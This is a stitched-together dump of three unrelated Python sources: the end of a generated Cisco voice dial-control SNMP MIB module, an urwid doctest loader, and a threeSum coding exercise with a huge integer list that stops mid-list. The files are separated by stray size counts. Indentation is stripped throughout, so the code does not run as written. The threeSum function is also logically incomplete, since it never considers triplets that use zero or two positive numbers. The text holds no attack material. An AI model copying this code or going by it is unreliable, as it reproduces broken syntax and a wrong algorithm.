cvCommonDcCallHistoryCodecBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(10, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryCodecBytes.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryCodecBytes.setDescription('Specifies the payload size of the voice packet.')
cvCommonDcCallHistoryInBandSignaling = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 5), CvcInBandSignaling()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryInBandSignaling.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryInBandSignaling.setDescription('Specifies the type of in-band signaling used on the call. This object is instantiated only for Connection Trunk calls.')
cvCommonDcCallHistoryCallingName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 6), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryCallingName.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryCallingName.setDescription('The calling party name this call is connected to. If the name is not available, then it will have a length of zero.')
cvCommonDcCallHistoryCallerIDBlock = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 10, 55, 1, 2, 1, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cvCommonDcCallHistoryCallerIDBlock.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallHistoryCallerIDBlock.setDescription('The object indicates whether or not the caller ID feature is blocked for this voice call.')
cvCommonDcMIBNotificationPrefix = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 2))
cvCommonDcMIBNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 2, 0))
cvCommonDcMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 3))
cvCommonDcMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 1))
cvCommonDcMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 2))
cvCommonDcMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 1, 1)).setObjects(("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvCommonDcMIBCompliance = cvCommonDcMIBCompliance.setStatus('deprecated')
if mibBuilder.loadTexts: cvCommonDcMIBCompliance.setDescription('The compliance statement for entities which implement the CISCO VOICE COMMON MIB')
cvCommonDcMIBComplianceRev1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 1, 2)).setObjects(("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallGroup1"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvCommonDcMIBComplianceRev1 = cvCommonDcMIBComplianceRev1.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcMIBComplianceRev1.setDescription('The compliance statement for entities which implement the CISCO VOICE COMMON MIB')
cvCommonDcCallGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 2, 1)).setObjects(("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveConnectionId"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveVADEnable"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCoderTypeRate"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCodecBytes"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveInBandSignaling"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryConnectionId"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryVADEnable"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCoderTypeRate"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCodecBytes"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryInBandSignaling"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvCommonDcCallGroup = cvCommonDcCallGroup.setStatus('deprecated')
if mibBuilder.loadTexts: cvCommonDcCallGroup.setDescription('A collection of objects providing the common network call leg information.')
cvCommonDcCallGroup1 = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 10, 55, 3, 2, 2)).setObjects(("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveConnectionId"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveVADEnable"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCoderTypeRate"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCodecBytes"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveInBandSignaling"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCallingName"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallActiveCallerIDBlock"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryConnectionId"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryVADEnable"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCoderTypeRate"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCodecBytes"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryInBandSignaling"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCallingName"), ("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", "cvCommonDcCallHistoryCallerIDBlock"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvCommonDcCallGroup1 = cvCommonDcCallGroup1.setStatus('current')
if mibBuilder.loadTexts: cvCommonDcCallGroup1.setDescription('A collection of objects providing the common network call leg information.')
mibBuilder.exportSymbols("CISCO-VOICE-COMMON-DIAL-CONTROL-MIB", cvCommonDcCallHistoryCallingName=cvCommonDcCallHistoryCallingName, cvCommonDcCallActiveEntry=cvCommonDcCallActiveEntry, cvCommonDcCallHistoryCoderTypeRate=cvCommonDcCallHistoryCoderTypeRate, CvcVideoCoderRate=CvcVideoCoderRate, cvCommonDcCallHistoryVADEnable=cvCommonDcCallHistoryVADEnable, cvCommonDcCallHistoryInBandSignaling=cvCommonDcCallHistoryInBandSignaling, cvCommonDcMIBNotificationPrefix=cvCommonDcMIBNotificationPrefix, CvcCoderTypeRate=CvcCoderTypeRate, cvCommonDcCallActiveCodecBytes=cvCommonDcCallActiveCodecBytes, CvcGUid=CvcGUid, cvCommonDcCallHistoryCodecBytes=cvCommonDcCallHistoryCodecBytes, cvCommonDcMIBComplianceRev1=cvCommonDcMIBComplianceRev1, cvCommonDcCallActive=cvCommonDcCallActive, PYSNMP_MODULE_ID=ciscoVoiceCommonDialControlMIB, cvCommonDcCallHistory=cvCommonDcCallHistory, cvCommonDcCallActiveCallingName=cvCommonDcCallActiveCallingName, cvCommonDcCallActiveVADEnable=cvCommonDcCallActiveVADEnable, cvCommonDcCallActiveCallerIDBlock=cvCommonDcCallActiveCallerIDBlock, cvCommonDcCallHistoryCallerIDBlock=cvCommonDcCallHistoryCallerIDBlock, cvCommonDcMIBCompliance=cvCommonDcMIBCompliance, cvCommonDcCallGroup=cvCommonDcCallGroup, CvcSpeechCoderRate=CvcSpeechCoderRate, cvCommonDcMIBGroups=cvCommonDcMIBGroups, CvcInBandSignaling=CvcInBandSignaling, CvcCallReferenceIdOrZero=CvcCallReferenceIdOrZero, cvCommonDcMIBObjects=cvCommonDcMIBObjects, cvCommonDcMIBCompliances=cvCommonDcMIBCompliances, CvcH320CallType=CvcH320CallType, cvCommonDcCallHistoryEntry=cvCommonDcCallHistoryEntry, cvCommonDcCallActiveCoderTypeRate=cvCommonDcCallActiveCoderTypeRate, cvCommonDcCallGroup1=cvCommonDcCallGroup1, cvCommonDcCallHistoryTable=cvCommonDcCallHistoryTable, cvCommonDcCallActiveConnectionId=cvCommonDcCallActiveConnectionId, cvCommonDcMIBConformance=cvCommonDcMIBConformance, CvcFaxTransmitRate=CvcFaxTransmitRate, cvCommonDcMIBNotifications=cvCommonDcMIBNotifications, cvCommonDcCallActiveTable=cvCommonDcCallActiveTable, ciscoVoiceCommonDialControlMIB=ciscoVoiceCommonDialControlMIB, cvCommonDcCallActiveInBandSignaling=cvCommonDcCallActiveInBandSignaling, cvCommonDcCallHistoryConnectionId=cvCommonDcCallHistoryConnectionId)
| 28,327 | 11,703 |
import unittest
import doctest
import urwid
def load_tests(loader, tests, ignore):
module_doctests = [
urwid.widget,
urwid.wimp,
urwid.decoration,
urwid.display_common,
urwid.main_loop,
urwid.monitored_list,
urwid.raw_display,
'urwid.split_repr', # override function with same name
urwid.util,
urwid.signals,
urwid.graphics,
]
for m in module_doctests:
tests.addTests(doctest.DocTestSuite(m,
optionflags=doctest.ELLIPSIS | doctest.IGNORE_EXCEPTION_DETAIL))
return tests
| 600 | 205 |
from unittest import TestCase
def threeSum_old(nums):
result = []
for i in range(len(nums)):
for j in range(i + 1, len(nums)):
for k in range(j + 1, len(nums)):
if nums[i] + nums[j] + nums[k] == 0:
new_list = sorted([nums[i], nums[j], nums[k]])
if new_list not in result:
result.append(new_list)
return result
def threeSum(nums):
result = []
if len(nums) < 3:
return []
nums = sorted(nums)
first_positive_index = find_index_of_first_positive(nums)
print("+ve index", first_positive_index, nums[first_positive_index])
for i in range(first_positive_index):
for j in range(i + 1, first_positive_index):
sum_two = nums[i] + nums[j]
if -sum_two in nums[first_positive_index:]:
print("Can", sorted([nums[i], nums[j], nums[nums.index(-sum_two)]]))
new_list = sorted([nums[i], nums[j], nums[nums.index(-sum_two)]])
if new_list not in result:
result.append(new_list)
else:
print("already added")
else:
print("not in list")
print("result", result)
return result
def find_index_of_first_positive(n, start=0, end=None):
s = start
e = len(n) if end is None else end
mid = int((s + e) / 2)
if mid >= e:
return mid
elif n[mid] < 0:
return find_index_of_first_positive(n, mid + 1, e)
else:
return find_index_of_first_positive(n, s, mid)
print(threeSum([-2, 0, 1, 1, 2]))
print("-=-=-=-")
print(threeSum([-1, 0, 1, 2, -1, -4]))
list = [
82597,
-9243,
62390,
83030,
-97960,
-26521,
-61011,
83390,
-38677,
12333,
75987,
46091,
83794,
19355,
-71037,
-6242,
-28801,
324,
1202,
-90885,
-2989,
-95597,
-34333,
35528,
5680,
89093,
-90606,
50360,
-29393,
-27012,
53313,
65213,
99818,
-82405,
-41661,
-3333,
-51952,
72135,
-1523,
26377,
74685,
96992,
92263,
15929,
5467,
-99555,
-43348,
-41689,
-60383,
-3990,
32165,
65265,
-72973,
-58372,
12741,
-48568,
-46596,
72419,
-1859,
34153,
62937,
81310,
-61823,
-96770,
-54944,
8845,
-91184,
24208,
-29078,
31495,
65258,
14198,
85395,
70506,
-40908,
56740,
-12228,
-40072,
32429,
93001,
68445,
-73927,
25731,
-91859,
-24150,
10093,
-60271,
-81683,
-18126,
51055,
48189,
-6468,
25057,
81194,
-58628,
74042,
66158,
-14452,
-49851,
-43667,
11092,
39189,
-17025,
-79173,
13606,
83172,
92647,
-59741,
19343,
-26644,
-57607,
82908,
-20655,
1637,
80060,
98994,
39331,
-31274,
-61523,
91225,
-72953,
13211,
-75116,
-98421,
-41571,
-69074,
99587,
39345,
42151,
-2460,
98236,
15690,
-52507,
-95803,
-48935,
-46492,
-45606,
-79254,
-99851,
52533,
73486,
39948,
-7240,
71815,
-585,
-96252,
90990,
-93815,
93340,
-71848,
58733,
-14859,
-83082,
-75794,
-82082,
-24871,
-15206,
91207,
-56469,
-93618,
67131,
-8682,
75719,
87429,
-98757,
-7535,
-24890,
-94160,
85003,
33928,
75538,
97456,
-66424,
-60074,
-8527,
-28697,
-22308,
2246,
-70134,
-82319,
-10184,
87081,
-34949,
-28645,
-47352,
-83966,
-60418,
-15293,
-53067,
-25921,
55172,
75064,
95859,
48049,
34311,
-86931,
-38586,
33686,
-36714,
96922,
76713,
-22165,
-80585,
-34503,
-44516,
39217,
-28457,
47227,
-94036,
43457,
24626,
-87359,
26898,
-70819,
30528,
-32397,
-69486,
84912,
-1187,
-98986,
-32958,
4280,
-79129,
-65604,
9344,
58964,
50584,
71128,
-55480,
24986,
15086,
-62360,
-42977,
-49482,
-77256,
-36895,
-74818,
20,
3063,
-49426,
28152,
-97329,
6086,
86035,
-88743,
35241,
44249,
19927,
-10660,
89404,
24179,
-26621,
-6511,
57745,
-28750,
96340,
-97160,
-97822,
-49979,
52307,
79462,
94273,
-24808,
77104,
9255,
-83057,
77655,
21361,
55956,
-9096,
48599,
-40490,
-55107,
2689,
29608,
20497,
66834,
-34678,
23553,
-81400,
-66630,
-96321,
-34499,
-12957,
-20564,
25610,
-4322,
-58462,
20801,
53700,
71527,
24669,
-54534,
57879,
-3221,
33636,
3900,
97832,
-27688,
-98715,
5992,
24520,
-55401,
-57613,
-69926,
57377,
-77610,
20123,
52174,
860,
60429,
-91994,
-62403,
-6218,
-90610,
-37263,
-15052,
62069,
-96465,
44254,
89892,
-3406,
19121,
-41842,
-87783,
-64125,
-56120,
73904,
-22797,
-58118,
-4866,
5356,
75318,
46119,
21276,
-19246,
-9241,
-97425,
57333,
-15802,
93149,
25689,
-5532,
95716,
39209,
-87672,
-29470,
-16324,
-15331,
27632,
-39454,
56530,
-16000,
29853,
46475,
78242,
-46602,
83192,
-73440,
-15816,
50964,
-36601,
89758,
38375,
-40007,
-36675,
-94030,
67576,
46811,
-64919,
45595,
76530,
40398,
35845,
41791,
67697,
-30439,
-82944,
63115,
33447,
-36046,
-50122,
-34789,
43003,
-78947,
-38763,
-89210,
32756,
-20389,
-31358,
-90526,
-81607,
88741,
86643,
98422,
47389,
-75189,
13091,
95993,
-15501,
94260,
-25584,
-1483,
-67261,
-70753,
25160,
89614,
-90620,
-48542,
83889,
-12388,
-9642,
-37043,
-67663,
28794,
-8801,
13621,
12241,
55379,
84290,
21692,
-95906,
-85617,
-17341,
-63767,
80183,
-4942,
-51478,
30997,
-13658,
8838,
17452,
-82869,
-39897,
68449,
31964,
98158,
-49489,
62283,
-62209,
-92792,
-59342,
55146,
-38533,
20496,
62667,
62593,
36095,
-12470,
5453,
-50451,
74716,
-17902,
3302,
-16760,
-71642,
-34819,
96459,
-72860,
21638,
47342,
-69897,
-40180,
44466,
76496,
84659,
13848,
-91600,
-90887,
-63742,
-2156,
-84981,
-99280,
94326,
-33854,
92029,
-50811,
98711,
-36459,
-75555,
79110,
-88164,
-97397,
-84217,
97457,
64387,
30513,
-53190,
-83215,
252,
2344,
-27177,
-92945,
-89010,
82662,
-11670,
86069,
53417,
42702,
97082,
3695,
-14530,
-46334,
17910,
77999,
28009,
-12374,
15498,
-46941,
97088,
-35030,
95040,
92095,
-59469,
-24761,
46491,
67357,
-66658,
37446,
-65130,
-50416,
99197,
30925,
27308,
54122,
-44719,
12582,
-99525,
-38446,
-69050,
-22352,
94757,
-56062,
33684,
-40199,
-46399,
96842,
-50881,
-22380,
-65021,
40582,
53623,
-76034,
77018,
-97074,
-84838,
-22953,
-74205,
79715,
-33920,
-35794,
-91369,
73421,
-82492,
63680,
-14915,
-33295,
37145,
76852,
-69442,
60125,
-74166,
74308,
-1900,
-30195,
-16267,
-60781,
-27760,
5852,
38917,
25742,
-3765,
49097,
-63541,
98612,
-92865,
-30248,
9612,
-8798,
53262,
95781,
-42278,
-36529,
7252,
-27394,
-5021,
59178,
80934,
-48480,
-75131,
-54439,
-19145,
-48140,
98457,
-6601,
-51616,
-89730,
78028,
32083,
-48904,
16822,
-81153,
-8832,
48720,
-80728,
-45133,
-86647,
-4259,
-40453,
2590,
28613,
50523,
-4105,
-27790,
-74579,
-17223,
63721,
33489,
-47921,
97628,
-97691,
-14782,
-65644,
18008,
-93651,
-71266,
80990,
-76732,
-47104,
35368,
28632,
59818,
-86269,
-89753,
34557,
-92230,
-5933,
-3487,
-73557,
-13174,
-43981,
-43630,
-55171,
30254,
-83710,
-99583,
-13500,
71787,
5017,
-25117,
-78586,
86941,
-3251,
-23867,
-36315,
75973,
86272,
-45575,
77462,
-98836,
-10859,
70168,
-32971,
-38739,
-12761,
93410,
14014,
-30706,
-77356,
-85965,
-62316,
63918,
-59914,
-64088,
1591,
-10957,
38004,
15129,
-83602,
-51791,
34381,
-89382,
-26056,
8942,
5465,
71458,
-73805,
-87445,
-19921,
-80784,
69150,
-34168,
28301,
-68955,
18041,
6059,
82342,
9947,
39795,
44047,
-57313,
48569,
81936,
-2863,
-80932,
32976,
-86454,
-84207,
33033,
32867,
9104,
-16580,
-25727,
80157,
-70169,
53741,
86522,
84651,
68480,
84018,
61932,
7332,
-61322,
-69663,
76370,
41206,
12326,
-34689,
17016,
82975,
-23386,
39417,
72793,
44774,
-96259,
3213,
79952,
29265,
-61492,
-49337,
14162,
65886,
3342,
-41622,
-62659,
-90402,
-24751,
88511,
54739,
-21383,
-40161,
-96610,
-24944,
-602,
-76842,
-21856,
69964,
43994,
-15121,
-85530,
12718,
13170,
-13547,
69222,
62417,
-75305,
-81446,
-38786,
-52075,
-23110,
97681,
-82800,
-53178,
11474,
35857,
94197,
-58148,
-23689,
32506,
92154,
-64536,
-73930,
-77138,
97446,
-83459,
70963,
22452,
68472,
-3728,
-25059,
-49405,
95129,
-6167,
12808,
99918,
30113,
-12641,
-26665,
86362,
-33505,
50661,
26714,
33701,
89012,
-91540,
40517,
-12716,
-57185,
-87230,
29914,
-59560,
13200,
-72723,
58272,
23913,
-45586,
-96593,
-26265,
-2141,
31087,
81399,
92511,
-34049,
20577,
2803,
26003,
8940,
42117,
40887,
-82715,
38269,
40969,
-50022,
72088,
21291,
-67280,
-16523,
90535,
18669,
94342,
-39568,
-88080,
-99486,
-20716,
23108,
-28037,
63342,
36863,
-29420,
-44016,
75135,
73415,
16059,
-4899,
86893,
43136,
-7041,
33483,
-67612,
25327,
40830,
6184,
61805,
4247,
81119,
-22854,
-26104,
-63466,
63093,
-63685,
60369,
51023,
51644,
-16350,
74438,
-83514,
99083,
10079,
-58451,
-79621,
48471,
67131,
-86940,
99093,
11855,
-22272,
-67683,
-44371,
9541,
18123,
37766,
-70922,
80385,
-57513,
-76021,
-47890,
36154,
72935,
84387,
-92681,
-88303,
-7810,
59902,
-90,
-64704,
-28396,
-66403,
8860,
13343,
33882,
85680,
7228,
28160,
-14003,
54369,
-58893,
92606,
-63492,
-10101,
64714,
58486,
29948,
-44679,
-22763,
10151,
-56695,
4031,
-18242,
-36232,
86168,
-14263,
9883,
47124,
47271,
92761,
-24958,
-73263,
-79661,
-69147,
-18874,
29546,
-92588,
-85771,
26451,
-86650,
-43306,
-59094,
-47492,
-34821,
-91763,
-47670,
33537,
22843,
67417,
-759,
92159,
63075,
94065,
-26988,
55276,
65903,
30414,
-67129,
-99508,
-83092,
-91493,
-50426,
14349,
-83216,
-76090,
32742,
-5306,
-93310,
-60750,
-60620,
-45484,
-21108,
-58341,
-28048,
-52803,
69735,
78906,
81649,
32565,
-86804,
-83202,
-65688,
-1760,
89707,
93322,
-72750,
84134,
71900,
-37720,
19450,
-78018,
22001,
-23604,
26276,
-21498,
65892,
-72117,
-89834,
-23867,
55817,
-77963,
42518,
93123,
-83916,
63260,
-2243,
-97108,
85442,
-36775,
17984,
-58810,
99664,
-19082,
93075,
-69329,
87061,
79713,
16296,
70996,
13483,
-74582,
49900,
-27669,
-40562,
1209,
-20572,
34660,
83193,
75579,
7344,
64925,
88361,
60969,
3114,
44611,
-27445,
53049,
-16085,
-92851,
-53306,
13859,
-33532,
86622,
-75666,
-18159,
-98256,
51875,
-42251,
-27977,
-18080,
23772,
38160,
41779,
9147,
94175,
99905,
-85755,
62535,
-88412,
-52038,
-68171,
93255,
-44684,
-11242,
-104,
31796,
62346,
-54931,
-55790,
-70032,
46221,
56541,
-91947,
90592,
93503,
4071,
20646,
4856,
-63598,
15396,
-50708,
32138,
-85164,
38528,
-89959,
53852,
57915,
-42421,
-88916,
-75072,
67030,
-29066,
49542,
-71591,
61708,
-53985,
-43051,
28483,
46991,
-83216,
80991,
-46254,
-48716,
39356,
-8270,
-47763,
-34410,
874,
-1186,
-7049,
28846,
11276,
21960,
-13304,
-11433,
-4913,
55754,
79616,
70423,
-27523,
64803,
49277,
14906,
-97401,
-92390,
91075,
70736,
21971,
-3303,
55333,
-93996,
76538,
54603,
-75899,
98801,
46887,
35041,
48302,
-52318,
55439,
24574,
14079,
-24889,
83440,
14961,
34312,
-89260,
-22293,
-81271,
-2586,
-71059,
-10640,
-93095,
-5453,
-70041,
66543,
74012,
-11662,
-52477,
-37597,
-70919,
92971,
-17452,
-67306,
-80418,
7225,
-89296,
24296,
86547,
37154,
-10696,
74436,
-63959,
58860,
33590,
-88925,
-97814,
-83664,
85484,
-8385,
-50879,
57729,
-74728,
-87852,
-15524,
-91120,
22062,
28134,
80917,
32026,
49707,
-54252,
-44319,
-35139,
13777,
44660,
85274,
25043,
58781,
-89035,
-76274,
6364,
-63625,
72855,
43242,
-35033,
12820,
-27460,
77372,
-47578,
-61162,
-70758,
-1343,
-4159,
64935,
56024,
-2151,
43770,
19758,
-30186,
-86040,
24666,
-62332,
-67542,
73180,
-25821,
-27826,
-45504,
-36858,
-12041,
20017,
-24066,
-56625,
-52097,
-47239,
-90694,
8959,
7712,
-14258,
-5860,
55349,
61808,
-4423,
-93703,
64681,
-98641,
-25222,
46999,
-83831,
-54714,
19997,
-68477,
66073,
51801,
-66491,
52061,
-52866,
79907,
-39736,
-68331,
68937,
91464,
98892,
910,
93501,
31295,
-85873,
27036,
-57340,
50412,
21,
-2445,
29471,
71317,
82093,
-94823,
-54458,
-97410,
39560,
-7628,
66452,
39701,
54029,
37906,
46773,
58296,
60370,
-61090,
85501,
-86874,
71443,
-72702,
-72047,
14848,
34102,
77975,
-66294,
-36576,
31349,
52493,
-70833,
-80287,
94435,
39745,
-98291,
84524,
-18942,
10236,
93448,
50846,
94023,
-6939,
47999,
14740,
30165,
81048,
84935,
-19177,
-13594,
32289,
62628,
-90612,
-542,
-66627,
64255,
71199,
-83841,
-82943,
-73885,
8623,
-67214,
-9474,
-35249,
62254,
-14087,
-90969,
21515,
-83303,
94377,
-91619,
19956,
-98810,
96727,
-91939,
29119,
-85473,
-82153,
-69008,
44850,
74299,
-76459,
-86464,
8315,
-49912,
-28665,
59052,
-69708,
76024,
-92738,
50098,
18683,
-91438,
18096,
-19335,
35659,
91826,
15779,
-73070,
67873,
-12458,
-71440,
-46721,
54856,
97212,
-81875,
35805,
36952,
68498,
81627,
-34231,
81712,
27100,
-9741,
-82612,
18766,
-36392,
2759,
41728,
69743,
26825,
48355,
-17790,
17165,
56558,
3295,
-24375,
55669,
-16109,
24079,
73414,
48990,
-11931,
-78214,
90745,
19878,
35673,
-15317,
-89086,
94675,
-92513,
88410,
-93248,
-19475,
-74041,
-19165,
32329,
-26266,
-46828,
-18747,
45328,
8990,
-78219,
-25874,
-74801,
-44956,
-54577,
-29756,
-99822,
-35731,
-18348,
-68915,
-83518,
-53451,
95471,
-2954,
-13706,
-8763,
-21642,
-37210,
16814,
-60070,
-42743,
27697,
-36333,
-42362,
11576,
85742,
-82536,
68767,
-56103,
-63012,
71396,
-78464,
-68101,
-15917,
-11113,
-3596,
77626,
-60191,
-30585,
-73584,
6214,
-84303,
18403,
23618,
-15619,
-89755,
-59515,
-59103,
-74308,
-63725,
-29364,
-52376,
-96130,
70894,
-12609,
50845,
-2314,
42264,
-70825,
64481,
55752,
4460,
-68603,
-88701,
4713,
-50441,
-51333,
-77907,
97412,
-66616,
-49430,
60489,
-85262,
-97621,
-18980,
44727,
-69321,
-57730,
66287,
-92566,
-64427,
-14270,
11515,
-92612,
-87645,
61557,
24197,
-81923,
-39831,
-10301,
-23640,
-76219,
-68025,
92761,
-76493,
68554,
-77734,
-95620,
-11753,
-51700,
98234,
-68544,
-61838,
29467,
46603,
-18221,
-35441,
74537,
40327,
-58293,
75755,
-57301,
-7532,
-94163,
18179,
-14388,
-22258,
-46417,
-48285,
18242,
-77551,
82620,
250,
-20060,
-79568,
-77259,
82052,
-98897,
-75464,
48773,
-79040,
-11293,
45941,
-67876,
-69204,
-46477,
-46107,
792,
60546,
-34573,
-12879,
-94562,
20356,
-48004,
-62429,
96242,
40594,
2099,
99494,
25724,
-39394,
-2388,
-18563,
-56510,
-83570,
-29214,
3015,
74454,
74197,
76678,
-46597,
60630,
-76093,
37578,
-82045,
-24077,
62082,
-87787,
-74936,
58687,
12200,
-98952,
70155,
-77370,
21710,
-84625,
-60556,
-84128,
925,
65474,
-15741,
-94619,
88377,
89334,
44749,
22002,
-45750,
-93081,
-14600,
-83447,
46691,
85040,
-66447,
-80085,
56308,
44310,
24979,
-29694,
57991,
4675,
-71273,
-44508,
13615,
-54710,
23552,
-78253,
-34637,
50497,
68706,
81543,
-88408,
-21405,
6001,
-33834,
-21570,
-46692,
-25344,
20310,
71258,
-97680,
11721,
59977,
59247,
-48949,
98955,
-50276,
-80844,
-27935,
-76102,
55858,
-33492,
40680,
66691,
-33188,
8284,
64893,
-7528,
6019,
-85523,
8434,
-64366,
-56663,
26862,
30008,
-7611,
-12179,
-70076,
21426,
-11261,
-36864,
-61937,
-59677,
929,
-21052,
3848,
-20888,
-16065,
98995,
-32293,
-86121,
-54564,
77831,
68602,
74977,
31658,
40699,
29755,
98424,
80358,
-69337,
26339,
13213,
-46016,
-18331,
64713,
-46883,
-58451,
-70024,
-92393,
-4088,
70628,
-51185,
71164,
-75791,
-1636,
-29102,
-16929,
-87650,
-84589,
-24229,
-42137,
-15653,
94825,
13042,
88499,
-47100,
-90358,
-7180,
29754,
-65727,
-42659,
-85560,
-9037,
-52459,
20997,
-47425,
17318,
21122,
20472,
-23037,
65216,
-63625,
-7877,
-91907,
24100,
-72516,
22903,
-85247,
-8938,
73878,
54953,
87480,
-31466,
-99524,
35369,
-78376,
89984,
-15982,
94045,
-7269,
23319,
-80456,
-37653,
-76756,
2909,
81936,
54958,
-12393,
60560,
-84664,
-82413,
66941,
-26573,
-97532,
64460,
18593,
-85789,
-38820,
-92575,
-43663,
-89435,
83272,
-50585,
13616,
-71541,
-53156,
727,
-27644,
16538,
34049,
57745,
34348,
35009,
16634,
-18791,
23271,
-63844,
95817,
21781,
16590,
59669,
15966,
-6864,
48050,
-36143,
97427,
-59390,
96931,
78939,
-1958,
50777,
43338,
-51149,
39235,
-27054,
-43492,
67457,
-83616,
37179,
10390,
85818,
2391,
73635,
87579,
-49127,
-81264,
-79023,
-81590,
53554,
-74972,
-83940,
-13726,
-39095,
29174,
78072,
76104,
47778,
25797,
-29515,
-6493,
-92793,
22481,
-36197,
-65560,
42342,
15750,
97556,
99634,
-56048,
-35688,
13501,
63969,
-74291,
50911,
39225,
93702,
-3490,
-59461,
-30105,
-46761,
-80113,
92906,
-68487,
50742,
36152,
-90240,
-83631,
24597,
-50566,
-15477,
18470,
77038,
40223,
-80364,
-98676,
70957,
-63647,
99537,
13041,
31679,
86631,
37633,
-16866,
13686,
-71565,
21652,
-46053,
-80578,
-61382,
68487,
-6417,
4656,
20811,
67013,
-30868,
-11219,
46,
74944,
14627,
56965,
42275,
-52480,
52162,
-84883,
-52579,
-90331,
92792,
42184,
-73422,
-58440,
65308,
-25069,
5475,
-57996,
59557,
-17561,
2826,
-56939,
14996,
-94855,
-53707,
99159,
43645,
-67719,
-1331,
21412,
41704,
31612,
32622,
1919,
-69333,
-69828,
22422,
-78842,
57896,
-17363,
27979,
-76897,
35008,
46482,
-75289,
65799,
20057,
7170,
41326,
-76069,
90840,
-81253,
-50749,
3649,
-42315,
45238,
-33924,
62101,
96906,
58884,
-7617,
-28689,
-66578,
62458,
50876,
-57553,
6739,
41014,
-64040,
-34916,
37940,
13048,
-97478,
-11318,
-89440,
-31933,
-40357,
-59737,
-76718,
-14104,
-31774,
28001,
4103,
41702,
-25120,
-31654,
63085,
-3642,
84870,
-83896,
-76422,
-61520,
12900,
88678,
85547,
33132,
-88627,
52820,
63915,
-27472,
78867,
-51439,
33005,
-23447,
-3271,
-39308,
39726,
-74260,
-31874,
-36893,
93656,
910,
-98362,
60450,
-88048,
99308,
13947,
83996,
-90415,
-35117,
70858,
-55332,
-31721,
97528,
82982,
-86218,
6822,
25227,
36946,
97077,
-4257,
-41526,
56795,
89870,
75860,
-70802,
21779,
14184,
-16511,
-89156,
-31422,
71470,
69600,
-78498,
74079,
-19410,
40311,
28501,
26397,
-67574,
-32518,
68510,
38615,
19355,
-6088,
-97159,
-29255,
-92523,
3023,
-42536,
-88681,
64255,
41206,
44119,
52208,
39522,
-52108,
91276,
-70514,
83436,
63289,
-79741,
9623,
99559,
12642,
85950,
83735,
-21156,
-67208,
98088,
-7341,
-27763,
-30048,
-44099,
-14866,
-45504,
-91704,
19369,
13700,
10481,
-49344,
-85686,
33994,
19672,
36028,
60842,
66564,
-24919,
33950,
-93616,
-47430,
-35391,
-28279,
56806,
74690,
39284,
-96683,
-7642,
-75232,
37657,
